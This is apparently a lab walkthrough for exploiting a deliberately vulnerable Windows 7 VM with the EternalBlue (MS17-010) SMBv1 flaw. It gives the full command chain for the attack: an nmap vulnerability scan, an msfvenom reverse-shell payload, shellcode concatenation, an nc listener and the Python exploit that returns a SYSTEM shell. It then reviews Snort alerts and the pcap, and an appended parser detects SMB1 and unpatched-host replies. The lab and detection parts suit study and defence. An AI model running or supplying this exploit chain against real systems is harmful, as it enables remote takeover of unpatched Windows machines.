Exploitation with Eternalblue : Win7

What is Eternalblue?

It’s a software vulnerability in the Microsoft Windows OS that works by exploiting Microsoft Server Message Block 1.0 (SMBv1) on various Microsoft Windows versions.
SMB, or Server Message Block, is a network file sharing protocol that allows applications on a computer to read and write files and to request services from other machines on the same network.

How does the Eternalblue exploit work?

It allows us to write to and overwrite memory by sending a large buffer into the SMB1 buffer. The kernel memory pool is then laid out so that the RIP pointer points at the overwritten memory, which reads and executes our payload.

We are going to use a standalone Eternalblue exploit module written in Python. This is a buffer overflow, which lets us attack a vulnerable Win7 VM and gives us a system-level cmd.exe shell.

What we need:
Win7 VM (vulnerable machine)
Kali Linux (attack machine)
(Optional) Security Onion (sniffing interface between Kali and Win7)

Kali VM IP :

Win7 VM IP:

In Win7 VM :
1) Open command prompt as an administrator
2) Type: powershell
3) To enable SMB version 1, type:
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name SMB1 -Type DWORD -Value 1 -Force
4) Disable the firewall

At this point, our Win7 VM is vulnerable to Eternalblue.

(Optional) In Security Onion:
Put the Security Onion network adapter in promiscuous mode. Security Onion will act as a sniffing interface between the Kali VM and the Win7 VM.

In terminal, type:
$ sudo tcpdump -nnttttAi eth0

It will start sniffing on that interface.

In Kali VM:
1) Ping the Win7 IP to check connectivity.
2) Run nmap with the NSE scripts related to SMB vulnerabilities to check whether Win7 is vulnerable.
3) Open a terminal and type:
$ nmap -p 445 --script "smb-vuln*"

This says that Win7 is vulnerable; let’s test it out.

Download the Eternalblue MS17-010 repository from GitHub,
link: https://github.com/worawit/MS17-010.

Unzip the file, go to the download folder in the terminal (it will contain all the files from the zip), and run the following command:

$ nasm -f bin eternalblue_kshellcode_x86.asm

The next command generates a malicious payload that lets us get a reverse shell from the Win7 VM to the Kali VM.

$ msfvenom -p windows/shell_reverse_tcp -a x86 --platform windows -e x86/shikata_ga_nai -f raw -o meterpreterx86.bin EXITFUNC=thread LHOST= LPORT=4444 -b '\x00\x0a\x0d'

< Shikata ga nai : it can’t be helped 😛>

$ cat eternalblue_kshellcode_x86 meterpreterx86.bin > sc_x86.bin

Open a new terminal window in the Kali VM and start netcat listening on that port (4444).
$ nc -nlvp 4444
Go back to the old terminal where we built our payload and run the following command.
$ python eternalblue_exploit7.py sc_x86.bin
While running this command, my Win7 VM crashed; you may encounter this issue too, as we are running a buffer overflow. If it doesn’t crash, you will get system-level access to Win7. If it has crashed, let the Win7 system reboot and run the last command in Kali again, and you will see something like this in the terminal where we were running netcat.
Check your Win7 VM to verify that we got shell-level access.
Voilà, 😈 you have compromised the Win7 VM.
In Security Onion: 
(Optional, but if you wanna know about rules and alerts, here you go. 😎)
Now we go to Security Onion to check what type of Snort alerts were raised as a result of this exploitation.
Open Squert, log in with your credentials, and you will see something like this.
Open any alert and you will see the rule type; check its hex value. These rule alerts say that an exploit has been performed.
To verify that our exploit was successful, we will check the pcap we were generating with tcpdump in Security Onion.
Open terminal and type the following command:
$ tcpdump -nnttttAr eternalblue.pcap | less -Sr
You can see the SMB vulnerability being exploited over port 445.
Here, we have got the Win7 access:
As you can see in the pcap, we got system-level access, and it shows up in plain text. It’s the same as what we have in the Win7 VM command prompt.
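As a defender-side counterpart to the alert and pcap review above, here is an added example (mine, not code from this post or from the worawit repository) that parses the SMB1 header out of a TCP/445 payload and flags the two things that traffic reveals: that SMB1 is in use at all, and a TRANSACTION reply carrying STATUS_INSUFF_SERVER_RESOURCES, the status the nmap smb-vuln-ms17-010 check from step 2 reads as an unpatched host. The function names, finding labels and sample frames are my own constructions; pulling real payloads out of eternalblue.pcap with a pcap reader is assumed and not shown.

```python
import struct

NBSS_LEN = 4                      # NetBIOS session service header: type (1) + length (3)
SMB1_HDR = "<4sBIBHH8sHHHHH"      # 32-byte SMB1 header, little-endian
SMB1_MAGIC, SMB2_MAGIC = b"\xffSMB", b"\xfeSMB"
FLAG_REPLY = 0x80                 # SMB_FLAGS_REPLY: message is a server response
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205
CMD_NAMES = {0x72: "NEGOTIATE", 0x73: "SESSION_SETUP_ANDX", 0x75: "TREE_CONNECT_ANDX",
             0x25: "TRANSACTION", 0x32: "TRANSACTION2", 0xA0: "NT_TRANSACT"}

def parse_smb1(tcp_payload):
    """Fields of an SMB1 message inside a NetBIOS session frame, or None if not SMB1."""
    if len(tcp_payload) < NBSS_LEN + struct.calcsize(SMB1_HDR):
        return None
    (magic, cmd, status, flags, _flags2, _pid_hi, _sec, _rsv,
     tid, _pid_lo, uid, mid) = struct.unpack_from(SMB1_HDR, tcp_payload, NBSS_LEN)
    if magic != SMB1_MAGIC:
        return None
    return {"command": CMD_NAMES.get(cmd, hex(cmd)), "status": status,
            "is_reply": bool(flags & FLAG_REPLY), "tid": tid, "uid": uid, "mid": mid}

def classify(tcp_payload):
    """Findings for one TCP/445 payload: SMB1 in use at all, and the unpatched-host reply."""
    findings = []
    if tcp_payload[NBSS_LEN:NBSS_LEN + 4] == SMB2_MAGIC:
        return findings                         # SMB2/3 dialects: nothing to flag here
    hdr = parse_smb1(tcp_payload)
    if hdr is None:
        return findings
    findings.append("smb1-in-use:" + hdr["command"])   # SMB1 should be disabled entirely
    # A TRANSACTION reply with STATUS_INSUFF_SERVER_RESOURCES is what the nmap
    # smb-vuln-ms17-010 probe reads as "unpatched", so a scanner just found a target.
    if (hdr["is_reply"] and hdr["command"] == "TRANSACTION"
            and hdr["status"] == STATUS_INSUFF_SERVER_RESOURCES):
        findings.append("ms17-010-unpatched-reply")
    return findings

def build_frame(cmd, status=0, flags=0x18, body=b""):
    """Constructed test frame: NetBIOS session header + SMB1 header + body (not captured)."""
    hdr = struct.pack(SMB1_HDR, SMB1_MAGIC, cmd, status, flags, 0xC801, 0,
                      b"\0" * 8, 0, 0, 0xFEFF, 0, 0)
    return b"\x00" + len(hdr + body).to_bytes(3, "big") + hdr + body

# Constructed samples: an SMB1 NEGOTIATE request offering "NT LM 0.12", a TRANSACTION
# reply carrying the unpatched status, and an SMB2 frame for contrast.
SAMPLE_NEGOTIATE = build_frame(0x72, body=b"\x00\x0c\x00\x02NT LM 0.12\x00")
SAMPLE_TRANS_REPLY = build_frame(0x25, status=STATUS_INSUFF_SERVER_RESOURCES, flags=0x98)
SAMPLE_SMB2 = b"\x00\x00\x00\x40" + SMB2_MAGIC + b"\0" * 60
```

Run `classify()` over each TCP payload to port 445 from the capture; any "smb1-in-use" finding on a production network is itself a hardening task, and the "ms17-010-unpatched-reply" finding means a scanner got a positive answer from that host.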

